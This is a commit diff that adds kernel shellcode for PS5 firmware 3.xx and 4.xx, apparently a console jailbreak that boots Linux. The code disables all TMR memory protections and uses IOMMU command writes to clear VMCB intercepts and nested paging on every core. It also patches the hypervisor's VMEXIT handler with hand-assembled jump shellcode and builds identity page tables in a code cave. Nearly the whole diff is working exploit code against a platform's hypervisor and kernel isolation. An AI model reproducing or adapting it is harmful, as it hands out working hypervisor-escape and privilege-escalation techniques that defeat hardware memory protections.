initial commit support 3.xx and 4.xx

shellcode_kernel/Makefile

@@ -0,0 +1,33 @@
+ifndef PS5_PAYLOAD_SDK
+    PS5_PAYLOAD_SDK = /opt/ps5-payload-sdk/
+endif
+
+
+CC      = gcc
+LD      = ld
+CFLAGS  = -O2 -fno-stack-protector -ffreestanding -nostdlib -I$(PS5_PAYLOAD_SDK)/target/include
+LDFLAGS = -T linker.ld
+TARGET  = shellcode_kernel.elf
+TEXT_BIN = shellcode_text.bin
+
+SRC = main.c utils.c kernel_code.c
+OBJ = $(SRC:.c=.o)
+
+dump = shellcode_kernel.h
+
+all: $(dump)
+
+$(TARGET): $(OBJ)
+	$(CC) $(CFLAGS) $(LDFLAGS) $(OBJ) -o $(TARGET)
+
+%.o: %.c
+	$(CC) $(CFLAGS) -c $< -o $@
+
+$(TEXT_BIN): $(TARGET)
+	objcopy -O binary -j .text $(TARGET) $(TEXT_BIN)
+
+clean:
+	rm -f $(OBJ) $(TARGET) $(TEXT_BIN) $(dump)
+
+$(dump): $(TEXT_BIN)
+	python3 bin_to_c_kernel.py $(TEXT_BIN)

shellcode_kernel/bin_to_c_kernel.py

@@ -0,0 +1,48 @@
+import sys
+import os
+
+def create_shellcode_header(input_file_text):
+    if not os.path.exists(input_file_text):
+        print(f"Error: {input_file_text} not found.")
+        return
+
+    # Read binary data_text
+    with open(input_file_text, "rb") as f:
+        data_text = f.read()
+
+    # Hardcoded output name
+    output_name = "shellcode_kernel.h"
+    array_name_text = "shellcode_kernel_text"
+    
+    with open(output_name, "w") as f:
+        f.write(f"// Generated from {input_file_text}\n")
+        f.write(f"#ifndef SHELLCODE_KERNEL_H\n")
+        f.write(f"#define SHELLCODE_KERNEL_H\n\n")
+        f.write(f"#include <unistd.h>\n\n")
+
+        f.write(f"#include \"shellcode_kernel_args.h\"\n\n")
+
+        f.write(f"uint8_t {array_name_text}[] = {{\n    ")
+        
+        for i, byte in enumerate(data_text):
+            f.write(f"0x{byte:02X}")
+            
+            if i < len(data_text) - 1:
+                f.write(", ")
+            
+            # New line every 12 bytes
+            if (i + 1) % 12 == 0:
+                f.write("\n    ")
+        
+        f.write(f"\n}};\n\n")
+        f.write(f"uint64_t {array_name_text}_len = {len(data_text)};\n\n")
+
+        f.write(f"#endif // SHELLCODE_KERNEL_H\n")
+
+    print(f"Done! Created {output_name} ({len(data_text)} bytes)")
+
+if __name__ == "__main__":
+    if len(sys.argv) < 2:
+        print("Usage: python bin_to_c_kernel.py <text.bin>")
+    else:
+        create_shellcode_header(sys.argv[1])

shellcode_kernel/kernel_code.c

@@ -0,0 +1,184 @@
+#include "kernel_code.h"
+#include "../include/config.h"
+#include "../shellcode_hypervisor/shellcode_hypervisor.h"
+#include "shellcode_kernel_args.h"
+#include "utils.h"
+
+#define DIG1TRANSMITTERCONTROL 0x4c
+
+#define TRANSMITTER_CONTROL_ENABLE 1
+#define TRANSMITTER_CONTROL_SET_VOLTAGE_AND_PREEMPASIS 11
+
+int (*transmitter_control)(int cmd, void *control) = NULL;  // Filled by main.c
+int (*mp3_initialize)(int vmid) = NULL;                     // Filled by main.c
+int (*mp3_invoke)(int cmd_id, void *req, void *rsp) = NULL; // Filled by main.c
+
+uint64_t g_vbios; // Filled by main.c
+
+typedef struct {
+  uint8_t lanenum;
+  uint32_t rate;
+  uint32_t pad;
+  uint32_t lane_setting_1;
+  uint32_t lane_setting_2;
+} transmitter_args;
+
+struct dig_transmitter_control_parameters_v1_6 {
+  uint8_t phyid;
+  uint8_t action;
+  union {
+    uint8_t digmode;
+    uint8_t dplaneset;
+  } mode_laneset;
+  uint8_t lanenum;
+  uint32_t symclk_10khz;
+  uint8_t hpdsel;
+  uint8_t digfe_sel;
+  uint8_t connobj_id;
+  uint8_t reserved;
+  uint32_t reserved1;
+};
+
+struct linux_info {
+  uintptr_t bzimage;
+  size_t bzimage_size;
+  uintptr_t initrd;
+  size_t initrd_size;
+  size_t vram_size;
+  char cmdline[2048];
+};
+
+static struct linux_info info;
+
+static int mp3_req[1281], mp3_rsp[1282];
+
+static inline void stac(void) { __asm__ volatile("stac" : : : "cc"); }
+
+static inline void clac(void) { __asm__ volatile("clac" : : : "cc"); }
+
+static inline uint64_t vmmcall(uint64_t nr, uint64_t a0, uint64_t a1,
+                               uint64_t a2) {
+  uint64_t ret;
+  __asm__ volatile("vmmcall"
+                   : "=a"(ret)
+                   : "a"(nr), "b"(a0), "c"(a1), "d"(a2)
+                   : "memory");
+  return ret;
+}
+
+static int dp_enable_link_phy(int lanenum, int linkrate) {
+  struct dig_transmitter_control_parameters_v1_6 params = {};
+  params.phyid = 0;
+  params.action = TRANSMITTER_CONTROL_ENABLE;
+  params.mode_laneset.digmode = 0;
+  params.lanenum = lanenum;
+  params.symclk_10khz = 27000 * linkrate / 10;
+  params.hpdsel = 0;
+  params.digfe_sel = 0;
+  params.connobj_id = 0;
+
+  return transmitter_control(DIG1TRANSMITTERCONTROL, &params);
+}
+
+static int mp3_set_hdcp_packet(int be, int mode) {
+  mp3_req[0] = be;
+  mp3_req[1] = mode;
+  return mp3_invoke(21, mp3_req, mp3_rsp);
+}
+
+static int mp3_enable_output(int be, int mode) {
+  mp3_req[0] = be;
+  mp3_req[1] = mode;
+  return mp3_invoke(22, mp3_req, mp3_rsp);
+}
+
+static void patch_hv(void) {
+
+  // Install identity map for HV
+  // HV Shellcode 1 it's updating CR3
+  uint64_t identity_cr3 = cave_hv_paging; // P, RW, US=0
+  uint64_t identity_pml4_0 =
+      identity_cr3 +
+      0x1003ULL; // P, RW, US=0 - 512GB // offset 0 +0x1000 from PML4
+  uint64_t l40_l3_addr = PAGE_PA(identity_pml4_0); // addr PML4[0]
+  uint64_t identity_pml40_l3[] = {
+      0x0000000000000083, // P, RW, US=0 - 0 GB to 1 GB
+      0x0000000040000083, // P, RW, US=0 - 1 GB to 2 GB
+      0x0000000080000083, // P, RW, US=0 - 3 GB to 3 GB
+      0x00000000C0000083, // P, RW, US=0 - 4 GB to 4 GB
+      0x0000000100000083  // P, RW, US=0 - 5 GB to 6 GB --> Our paging structure
+  };
+  uint64_t l3_size = sizeof(identity_pml40_l3) / sizeof(identity_pml40_l3[0]);
+
+  // Create the map in memory
+  *(uint64_t *)PHYS_TO_DMAP(identity_cr3) = identity_pml4_0;
+  for (uint64_t i = 0; i < l3_size; i++) {
+    *(uint64_t *)PHYS_TO_DMAP(l40_l3_addr + i * 8) = identity_pml40_l3[i];
+  }
+
+  // Install hv_shellcode 2
+  uint64_t hv_shellcode = cave_hv;
+  memcpy((void *)PHYS_TO_DMAP(hv_shellcode), shellcode_hypervisor,
+         shellcode_hypervisor_len);
+
+  // Jump to shellcode final identity mapping
+  uint8_t shellcode_jmp[] = {
+      0x48, 0xC7, 0xC0, 0x00, 0x6F, 0x80, 0x62, // mov rax, 0x62806f00
+      0xFF, 0xE0, 0xC3, 0xC3, 0xC3, 0xC3, 0xC3, // jmp rax
+      0xC3, 0xC3};
+
+  // Update code cave in hv 1:1 region
+  *(uint32_t *)(&shellcode_jmp[3]) = (uint32_t)args.hv_code_cave_pa;
+
+  // Just patch the VMEXIT handler directly, avoiding all checks (0x6282b45d)
+  memcpy(PHYS_TO_DMAP(args.hv_handle_vmexit_pa), shellcode_jmp,
+         sizeof(shellcode_jmp));
+
+  uint8_t shellcode_identity_and_jmp[] = {
+      0x48, 0xB8, 0x00, 0x00, 0x00,
+      0x00, 0x01, 0x00, 0x00, 0x00, // movabs rax, 0x100000000
+      0x0F, 0x22, 0xD8,             // mov    cr3, rax
+      0x48, 0xB8, 0x00, 0x30, 0x00,
+      0x00, 0x01, 0x00, 0x00, 0x00, // movabs rax, 0x100003000
+      0xFF, 0xE0                    // jmp    rax
+  };
+
+  // Update CR3 PA (from config)
+  *(uint64_t *)(&shellcode_identity_and_jmp[2]) = cave_hv_paging;
+  // Update HV shellcode cave
+  *(uint64_t *)(&shellcode_identity_and_jmp[15]) = cave_hv_code;
+
+  // Install shellcode 1 to update CR3 and jump to main HV shellcode
+  memcpy(PHYS_TO_DMAP(args.hv_code_cave_pa), shellcode_identity_and_jmp,
+         sizeof(shellcode_identity_and_jmp));
+}
+
+void boot_linux(void) {
+
+  patch_hv();
+
+  memcpy((void *)PHYS_TO_DMAP(0xC0000), g_vbios, 0x10000);
+
+  // Enable DP phys link.
+  dp_enable_link_phy(4, 30);
+
+  // Initialize hdcp in mp3.
+  mp3_initialize(0);
+  mp3_set_hdcp_packet(0, 1);
+  mp3_enable_output(0, 1);
+
+  // Copy bzImage and initrd into contiguous memory.
+  memcpy(&info, (void *)args.linux_info_va, sizeof(struct linux_info));
+
+  uintptr_t bzimage = info.bzimage; // Kernel wrote the VA here
+  uintptr_t initrd = info.initrd;   // Kernel wrote the VA here
+
+  info.bzimage = cave_bzImage;
+  info.initrd = cave_bzImage + ALIGN_UP(info.bzimage_size, PAGE_SIZE);
+
+  memcpy((void *)PHYS_TO_DMAP(cave_linux_info), &info,
+         sizeof(struct linux_info));
+  memcpy((void *)PHYS_TO_DMAP(info.bzimage), (void *)bzimage,
+         info.bzimage_size);
+  memcpy((void *)PHYS_TO_DMAP(info.initrd), (void *)initrd, info.initrd_size);
+}

shellcode_kernel/kernel_code.h

@@ -0,0 +1,24 @@
+#ifndef KERNEL_CODE_H
+#define KERNEL_CODE_H
+
+#include <stdint.h>
+
+#define cave 0x100000000ULL
+#define cave_hv_paging cave
+#define cave_hv cave_hv_paging + 0x3000
+#define cave_linux cave_hv + 0x2000
+
+#define PAGE_SIZE 4096
+#define ALIGN_UP(size, align) (((size) + (align) - 1) & ~((align) - 1))
+
+static int dp_enable_link_phy(int lanenum, int linkrate);
+static void patch_hv(void);
+void boot_linux(void);
+
+extern int (*transmitter_control)(int cmd, void *control);
+extern int (*mp3_initialize)(int vmid);
+extern int (*mp3_invoke)(int cmd_id, void *req, void *rsp);
+
+extern uint64_t g_vbios; // for main.c
+
+#endif

shellcode_kernel/linker.ld

@@ -0,0 +1,18 @@
+/* linker.ld */
+ENTRY(main)
+
+SECTIONS
+{
+    . = 0x1000; /* 0x1000 to avoid warnings from linker */
+    .text :
+    {
+        *(.entry_point)
+        *(.text)
+        *(.text.*)
+        *(.data)
+        *(.data.*)
+        *(.rodata*)
+        *(.bss)
+        *(.bss.*)
+    }
+}

shellcode_kernel/main.c

@@ -0,0 +1,296 @@
+#include "main.h"
+#include "kernel_code.h"
+#include "utils.h"
+#include <stdint.h>
+typedef int32_t size_t;
+typedef int32_t cpusetid_t;
+typedef int cpuwhich_t;
+typedef int cpulevel_t;
+typedef int32_t id_t;
+#include <sys/_cpuset.h>
+#include <sys/cpuset.h>
+
+#define MSR_EFER 0xC0000080
+
+shellcode_kernel_args args = {
+    .fw_version = 0xDEADBEEF, .fun_printf = 0x0, .vmcb = {0}};
+
+// We are being called instead of AcpiSetFirmwareWakingVector from
+// acpi_wakeup_machdep
+__attribute__((section(".entry_point"))) uint32_t main(uint64_t add1,
+                                                       uint64_t add2) {
+
+  // We will do main checks on .text only with a reference to .data to avoid
+  // fixed offsets first After NPTs are disabled, we can continue nornmally
+  // using all the variables in .data that are embedded in shellcode
+  volatile shellcode_kernel_args *args_ptr =
+      (volatile shellcode_kernel_args
+           *)0x11AA11AA11AA11AA; // To be replaced with proper address in .kdata
+                                 // by loader
+
+  // "Hide" the pointer from the optimizer
+  __asm__ volatile("" : "+r"(args_ptr));
+
+  // We don't have required information - Abort
+  if ((args_ptr->fun_printf & 0xFFFF) == 0) {
+    goto out;
+  }
+
+  // Activate UART on Kernel
+  uint32_t *uart_va = (uint32_t *)(args_ptr->dmap_base + 0xC0115110ULL);
+  *uart_va &= ~0x200;
+  uint32_t *override_char_va = (uint32_t *)args_ptr->kernel_uart_override;
+  *override_char_va = 0x0;
+
+  uint64_t iommu_cb2_pa =
+      ((uint64_t(*)(uint64_t))args_ptr->fun_va_to_pa)(args_ptr->iommu_cb2_va);
+  uint64_t iommu_cb3_pa =
+      ((uint64_t(*)(uint64_t))args_ptr->fun_va_to_pa)(args_ptr->iommu_cb3_va);
+  uint64_t iommu_eb_pa =
+      ((uint64_t(*)(uint64_t))args_ptr->fun_va_to_pa)(args_ptr->iommu_eb_va);
+
+  uint64_t unk;
+  int n_devices;
+
+  // Reconfigure IOMMU calling the HV
+  int ret = ((uint64_t(*)(uint64_t, uint64_t, uint64_t, uint64_t,
+                          int *))args_ptr->fun_hv_iommu_set_buffers)(
+      iommu_cb2_pa, iommu_cb3_pa, iommu_eb_pa, &unk, &n_devices);
+
+  if (ret != 0) {
+    putc_uart(args_ptr->dmap_base, 'I');
+    putc_uart(args_ptr->dmap_base, 'O');
+    putc_uart(args_ptr->dmap_base, 'M');
+    putc_uart(args_ptr->dmap_base, 'M');
+    putc_uart(args_ptr->dmap_base, 'U');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 's');
+    putc_uart(args_ptr->dmap_base, 'b');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 'X');
+    putc_uart(args_ptr->dmap_base, '\n');
+    goto out;
+  }
+
+  // Wait for completion
+  ret = ((uint64_t(*)(void))args_ptr->fun_hv_iommu_wait_completion)();
+
+  if (ret == 0) {
+
+    putc_uart(args_ptr->dmap_base, 'I');
+    putc_uart(args_ptr->dmap_base, 'O');
+    putc_uart(args_ptr->dmap_base, 'M');
+    putc_uart(args_ptr->dmap_base, 'M');
+    putc_uart(args_ptr->dmap_base, 'U');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 's');
+    putc_uart(args_ptr->dmap_base, 'b');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 'O');
+    putc_uart(args_ptr->dmap_base, 'K');
+    putc_uart(args_ptr->dmap_base, '\n');
+
+    // Allow R/W on HV and Kernel area
+    if (tmr_disable(args_ptr->dmap_base)) {
+
+      putc_uart(args_ptr->dmap_base, 'T');
+      putc_uart(args_ptr->dmap_base, 'M');
+      putc_uart(args_ptr->dmap_base, 'R');
+      putc_uart(args_ptr->dmap_base, ' ');
+      putc_uart(args_ptr->dmap_base, 'X');
+      putc_uart(args_ptr->dmap_base, '\n');
+
+      goto out;
+    }
+
+    putc_uart(args_ptr->dmap_base, 'T');
+    putc_uart(args_ptr->dmap_base, 'M');
+    putc_uart(args_ptr->dmap_base, 'R');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 'O');
+    putc_uart(args_ptr->dmap_base, 'K');
+    putc_uart(args_ptr->dmap_base, '\n');
+
+    // Patch HV
+    patch_vmcb(args_ptr);
+
+    putc_uart(args_ptr->dmap_base, 'V');
+    putc_uart(args_ptr->dmap_base, 'M');
+    putc_uart(args_ptr->dmap_base, 'C');
+    putc_uart(args_ptr->dmap_base, 'B');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 'O');
+    putc_uart(args_ptr->dmap_base, 'K');
+    putc_uart(args_ptr->dmap_base, '\n');
+
+    // Re-do this to force a VMEXIT without HV injecting faults
+    ((uint64_t(*)(uint64_t, uint64_t, uint64_t, uint64_t,
+                  int *))args_ptr->fun_hv_iommu_set_buffers)(
+        iommu_cb2_pa, iommu_cb3_pa, iommu_eb_pa, &unk, &n_devices);
+    ((uint64_t(*)(void))args_ptr->fun_hv_iommu_wait_completion)();
+
+    putc_uart(args_ptr->dmap_base, 'B');
+    putc_uart(args_ptr->dmap_base, 'a');
+    putc_uart(args_ptr->dmap_base, 'c');
+    putc_uart(args_ptr->dmap_base, 'k');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 'f');
+    putc_uart(args_ptr->dmap_base, 'r');
+    putc_uart(args_ptr->dmap_base, 'o');
+    putc_uart(args_ptr->dmap_base, 'm');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 'H');
+    putc_uart(args_ptr->dmap_base, 'V');
+    putc_uart(args_ptr->dmap_base, '\n');
+
+    // We can now initiate the global args variable and use it, as NPTs are
+    // disabled
+    init_global_pointers(args_ptr);
+
+    printf("HV_Defeat: we should be ready for Linux part\n");
+
+    boot_linux();
+    printf("Linux prepared OK\n");
+
+    // Activate HV UART - Not really needed but good for debugging
+    // *(uint32_t*)PHYS_TO_DMAP(args.hv_uart_override_pa) = 0x0;
+
+    printf("Calling smp_rendezvous to exit all cores to HV with ptr: %016lx\n",
+           (uint64_t)vmmcall_dummy);
+    printf("Good Bye VM :)\n");
+
+    smp_rendezvous(smp_no_rendevous_barrier, vmmcall_dummy,
+                   smp_no_rendevous_barrier, NULL);
+
+    printf("We shouldn't be here :(\n");
+  } else {
+    putc_uart(args_ptr->dmap_base, 'I');
+    putc_uart(args_ptr->dmap_base, 'O');
+    putc_uart(args_ptr->dmap_base, 'M');
+    putc_uart(args_ptr->dmap_base, 'M');
+    putc_uart(args_ptr->dmap_base, 'U');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 's');
+    putc_uart(args_ptr->dmap_base, 'b');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 'N');
+    putc_uart(args_ptr->dmap_base, 'O');
+    putc_uart(args_ptr->dmap_base, ' ');
+    putc_uart(args_ptr->dmap_base, 'O');
+    putc_uart(args_ptr->dmap_base, 'K');
+    putc_uart(args_ptr->dmap_base, '\n');
+  }
+
+out:
+  return 0;
+}
+
+__attribute__((noinline, optimize("O0"), naked)) void vmmcall_dummy(void) {
+  __asm__ volatile("mov $0x1, %rax \n"
+                   "vmmcall \n"
+                   "ret \n");
+}
+
+void halt(void) { __asm__ __volatile__("hlt"); }
+
+// Submit a single 16-byte command and wait for completion
+__attribute__((noinline, optimize("O0"))) void
+iommu_submit_cmd(shellcode_kernel_args *args_ptr, uint64_t *cmd) {
+  // Read the offset of current tail of command list
+  uint64_t curr_tail = *(
+      (uint64_t *)args_ptr->iommu_mmio_va +
+      IOMMU_MMIO_CB_TAIL /
+          8); // Offset in IOMMU Command Buffer - Downscale the size of the ptr
+  uint64_t next_tail = (curr_tail + IOMMU_CMD_ENTRY_SIZE) &
+                       IOMMU_CB_MASK; // Offset in IOMMU Command Buffer
+
+  // We write the command in the current empty entry
+  uint64_t *cmd_buffer =
+      args_ptr->iommu_cb2_va + curr_tail / 8; // Downscale the size of the ptr
+  // Copy 0x10 bytes (CMD Size)
+  cmd_buffer[0] = cmd[0];
+  cmd_buffer[1] = cmd[1];
+
+  __asm__ volatile("" : : : "memory"); // Prevent reordering
+  *((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8) =
+      next_tail; // Indicate the IOMMU that there is a CMD - Downscale the size
+                 // of the ptr
+
+  // Wait CMD processing completion - Head will be the Tail
+  while (*((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_HEAD / 8) !=
+         *((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8))
+    ;
+}
+
+// Write 8 bytes to a physical address using IOMMU completion wait store
+__attribute__((noinline, optimize("O0"))) void
+iommu_write8_pa(shellcode_kernel_args *args_ptr, uint64_t pa, uint64_t val) {
+  uint32_t cmd[4] = {0};
+  cmd[0] = (uint32_t)(pa & 0xFFFFFFF8) | 0x05;
+  cmd[1] = ((uint32_t)(pa >> 32) & 0xFFFFF) | 0x10000000;
+  cmd[2] = (uint32_t)(val);
+  cmd[3] = (uint32_t)(val >> 32);
+  iommu_submit_cmd(args_ptr, (uint64_t *)cmd);
+}
+
+__attribute__((noinline, optimize("O0"))) void
+patch_vmcb(shellcode_kernel_args *args_ptr) {
+  for (int i = 0; i < 16; i++) {
+    uint64_t pa = args_ptr->vmcb[i];
+    // args_ptr->fun_printf("Patching core: %02d VMCB_PA: 0x%016lx\n", i,
+    // args_ptr->vmcb[i]);
+    iommu_write8_pa(args_ptr, pa + 0x00,
+                    0x0000000000000000ULL); // Clear all intercepts (R/W) to
+                                            // CR0-CR15 and DR0-DR15
+    iommu_write8_pa(args_ptr, pa + 0x08,
+                    0x0004000000000000ULL); // Clear all intercepts of except.
+                                            // vectors but CPUID
+    iommu_write8_pa(args_ptr, pa + 0x10,
+                    0x000000000000000FULL); // Clear all except VMMCALL, VMLOAD,
+                                            // VMSAVE, VMRUN
+    iommu_write8_pa(args_ptr, pa + 0x58,
+                    0x0000000000000001ULL); // Guest ASID ... 1 ?
+    iommu_write8_pa(args_ptr, pa + 0x90,
+                    0x0000000000000000ULL); // Disable NP_ENABLE
+  }
+}
+
+__attribute__((noinline, optimize("O0"))) uint32_t tmr_read(uint64_t dmap,
+                                                            uint32_t addr) {
+  *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_INDEX_OFF) = addr;
+  return *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_DATA_OFF);
+}
+
+__attribute__((noinline, optimize("O0"))) void
+tmr_write(uint64_t dmap, uint32_t addr, uint32_t val) {
+  *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_INDEX_OFF) = addr;
+  *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_DATA_OFF) = val;
+}
+
+// On 1.xx and 2.xx the HV is embedded in kernel area on TMR 16
+// On 3.xx and 4.xx there are multiple TMR protecting HV and Kernel
+__attribute__((noinline, optimize("O0"))) int tmr_disable(uint64_t dmap) {
+  for (int i = 0; i < 24; i++) {
+    if (tmr_read(dmap, TMR_CONFIG(i)) != 0) {
+      tmr_write(dmap, TMR_CONFIG(i), 0);
+      if (tmr_read(dmap, TMR_CONFIG(i)) != 0) {
+        return -1;
+      }
+    }
+  }
+  return 0;
+}
+
+void init_global_pointers(shellcode_kernel_args *args_ptr) {
+
+  memcpy(&args, args_ptr, sizeof(args));
+
+  printf = args.fun_printf;
+  smp_rendezvous = args.fun_smp_rendezvous;
+  smp_no_rendevous_barrier = args.fun_smp_no_rendevous_barrier;
+
+  transmitter_control = args.fun_transmitter_control;
+  mp3_initialize = args.fun_mp3_initialize;
+  mp3_invoke = args.fun_mp3_invoke;
+  g_vbios = args.g_vbios;
+}

shellcode_kernel/main.h

@@ -0,0 +1,71 @@
+#ifndef MAIN_H
+#define MAIN_H
+#include "shellcode_kernel_args.h"
+#include <stdarg.h>
+#include <stdint.h>
+#include <sys/_cpuset.h>
+#include <sys/_types.h>
+
+void (*printf)(const char *format, ...);
+uint32_t (*AcpiSetFirmwareWakingVector)(uint64_t PhysicalAddress,
+                                        uint64_t PhysicalAddress64);
+uint64_t (*kernel_va_to_pa)(uint64_t va);
+uint32_t (*hv_iommu_set_buffers)(uint64_t cb2_pa, uint64_t cb3_pa,
+                                 uint64_t eb_pa, uint64_t unk, int *n_devices);
+uint32_t (*hv_iommu_wait_completion)(void);
+void (*smp_rendezvous)(void (*setup_func)(void *), void (*action_func)(void *),
+                       void (*teardown_func)(void *), void *arg);
+void (*smp_rendezvous_cpus)(cpuset_t map, void (*setup_func)(void *),
+                            void (*action_func)(void *),
+                            void (*teardown_func)(void *), void *arg);
+void (*smp_no_rendevous_barrier)(void);
+
+// We are being called instead of AcpiSetFirmwareWakingVector from
+// acpi_wakeup_machdep
+uint32_t main(uint64_t add1, uint64_t add2);
+
+uint64_t rdmsr(uint32_t msr);
+
+// tmr via ecam b0d18f2
+#ifndef ECAM_B0D18F2
+#define ECAM_B0D18F2 (0xF0000000ULL + 0x18ULL * 0x8000 + 2 * 0x1000)
+#define TMR_INDEX_OFF 0x80
+#define TMR_DATA_OFF 0x84
+#endif
+
+// tmr layout (hardware)
+#define TMR_BASE(n) ((n) * 0x10 + 0x00)
+#define TMR_LIMIT(n) ((n) * 0x10 + 0x04)
+#define TMR_CONFIG(n) ((n) * 0x10 + 0x08)
+#define TMR_REQUESTORS(n) ((n) * 0x10 + 0x0C)
+#define TMR_CFG_PERMISSIVE 0x3F07
+#define MAX_TMR 22
+#define MAX_SAVED_TMRS 8
+
+uint32_t tmr_read(uint64_t dmap, uint32_t addr);
+void tmr_write(uint64_t dmap, uint32_t addr, uint32_t val);
+
+int tmr_relax(void);
+
+// Command buffer MMIO offsets
+#define IOMMU_MMIO_CB_HEAD 0xa000
+#define IOMMU_MMIO_CB_TAIL 0xa008
+
+// Queue constants
+#define IOMMU_CB_SIZE 0x2000
+#define IOMMU_CB_MASK (IOMMU_CB_SIZE - 1)
+#define IOMMU_CMD_ENTRY_SIZE 0x10
+
+// Submit a single 16-byte command and wait for completion
+void iommu_submit_cmd(shellcode_kernel_args *args_ptr, uint64_t *cmd);
+// Write 8 bytes to a physical address using IOMMU completion wait store
+void iommu_write8_pa(shellcode_kernel_args *args_ptr, uint64_t pa,
+                     uint64_t val);
+
+void patch_vmcb(shellcode_kernel_args *args_ptr);
+
+#define NULL (void *)0
+void vmmcall_dummy(void);
+void halt(void);
+
+#endif

shellcode_kernel/shellcode_kernel_args.h

@@ -0,0 +1,37 @@
+// This file is shared between main payload and kernel shellcode
+#ifndef SHELLCODE_KERNEL_ARGS_H
+#define SHELLCODE_KERNEL_ARGS_H
+
+#include <stdint.h>
+
+typedef struct {
+  uint32_t fw_version;
+  uint64_t ktext;
+  uint64_t kdata;
+  uint64_t dmap_base;
+  uint64_t fun_printf;
+  uint64_t fun_va_to_pa;
+  uint64_t fun_hv_iommu_set_buffers;
+  uint64_t fun_hv_iommu_wait_completion;
+  uint64_t fun_acpi_set_fw_waking_vector;
+  uint64_t fun_smp_rendezvous;
+  uint64_t fun_smp_no_rendevous_barrier;
+  uint64_t fun_transmitter_control;
+  uint64_t fun_mp3_initialize;
+  uint64_t fun_mp3_invoke;
+  uint64_t g_vbios;
+  uint64_t iommu_mmio_va;
+  uint64_t iommu_cb2_va;
+  uint64_t iommu_cb3_va;
+  uint64_t iommu_eb_va;
+  uint64_t vmcb[16];
+  uint64_t kernel_uart_override;
+  uint64_t hv_handle_vmexit_pa;
+  uint64_t hv_code_cave_pa;
+  uint64_t hv_uart_override_pa;
+  uint64_t linux_info_va; // To relocate by kernel shellcode
+} shellcode_kernel_args;
+
+extern shellcode_kernel_args args; // Declared on main.c
+
+#endif

shellcode_kernel/utils.c

@@ -0,0 +1,77 @@
+#include "utils.h"
+#include "shellcode_kernel_args.h"
+
+extern shellcode_kernel_args args;
+
+uint64_t PHYS_TO_DMAP(uint64_t pa) { return args.dmap_base + pa; }
+
+void memcpy(void *dest, void *src, uint64_t len) {
+  uint8_t *d = (uint8_t *)dest;
+  const uint8_t *s = (const uint8_t *)src;
+  for (uint64_t i = 0; i < len; i++) {
+    d[i] = s[i];
+  }
+}
+
+uint64_t read_cr3(void) {
+  uint64_t cr3;
+  __asm__ volatile("mov %%cr3, %0"
+                   : "=r"(cr3) // Output: move CR3 into the variable 'cr3'
+                   :           // No inputs
+                   :           // No clobbered registers
+  );
+  return cr3;
+}
+
+// for ring0
+uint64_t va_to_pa_kernel(uint64_t va) {
+  uint64_t cr3 = read_cr3();
+  return va_to_pa_custom(va, cr3);
+}
+
+// Source: PS5_kldload
+uint64_t va_to_pa_custom(uint64_t va, uint64_t cr3_custom) {
+
+  uint64_t table_phys = cr3_custom & 0xFFFFFFFF;
+
+  for (int level = 0; level < 4; level++) {
+    int shift = 39 - (level * 9);
+    uint64_t idx = (va >> shift) & 0x1FF;
+    uint64_t entry;
+    uint64_t entry_va = PHYS_TO_DMAP(PAGE_PA(table_phys) + idx * 8);
+
+    entry = *(uint64_t *)entry_va;
+
+    if (!PAGE_P(entry))
+      return 0;
+
+    if ((level == 1 || level == 2) && PAGE_PS(entry)) {
+      uint64_t page_size = P_SIZE(level);
+      return PAGE_PA(entry) | (va & (page_size - 1));
+    }
+
+    if (level == 3)
+      return PAGE_PA(entry) | (va & 0xFFF);
+
+    table_phys = PAGE_PA(entry);
+  }
+  return 0;
+}
+
+__attribute__((noinline, optimize("O0"))) uint32_t putc_uart(uint64_t dmap,
+                                                             uint8_t tx_byte) {
+  volatile uint32_t *uart_tx = dmap + 0xc1010104ULL;
+  volatile uint32_t *uart_busy = dmap + 0xc101010cULL;
+  uint64_t timeout = 0xFFFFFFFF;
+  do {
+    timeout--;
+    if (timeout == 0)
+      break;
+  } while (((*uart_busy) & 0x20) == 0);
+
+  if (timeout == 0)
+    return -1;
+
+  *uart_tx = (uint32_t)tx_byte & 0xFF;
+  return 0;
+}

shellcode_kernel/utils.h

@@ -0,0 +1,43 @@
+#ifndef UTILS_H
+#define UTILS_H
+#include "shellcode_kernel_args.h"
+#include <stdint.h>
+
+extern void (*printf)(const char *format, ...);
+uint64_t PHYS_TO_DMAP(uint64_t pa);
+void memcpy(void *dest, void *src, uint64_t len);
+
+// Defines for Page management
+enum page_bits {
+  P = 0,
+  RW,
+  US,
+  PWT,
+  PCD,
+  A,
+  D,
+  PS,
+  G,
+  XO = 58,
+  PK = 59,
+  NX = 63
+};
+
+#define PG_B_P (1ULL << P)
+#define PG_B_RW (1ULL << RW)
+#define PAGE_P(x) (x & (1ULL << P))
+#define PAGE_RW(x) (x & (1ULL << RW))
+#define PAGE_PS(x) (x & (1ULL << PS))
+#define PAGE_XO(x) (x & (1ULL << XO))
+#define PAGE_CLEAR_XO(x) (x &= ~(1ULL << XO))
+#define PAGE_CLEAR_G(x) (x &= ~(1ULL << G))
+#define PAGE_SET_RW(x) (x |= (1ULL << RW))
+#define PAGE_PA(x) (x & 0x000FFFFFFFFFF000ULL)
+#define P_SIZE(l) ((l == 1) ? (1ULL << 30) : (1ULL << 21))
+
+uint64_t read_cr3(void);
+uint64_t va_to_pa_kernel(uint64_t va);
+uint64_t va_to_pa_custom(uint64_t va, uint64_t cr3_custom);
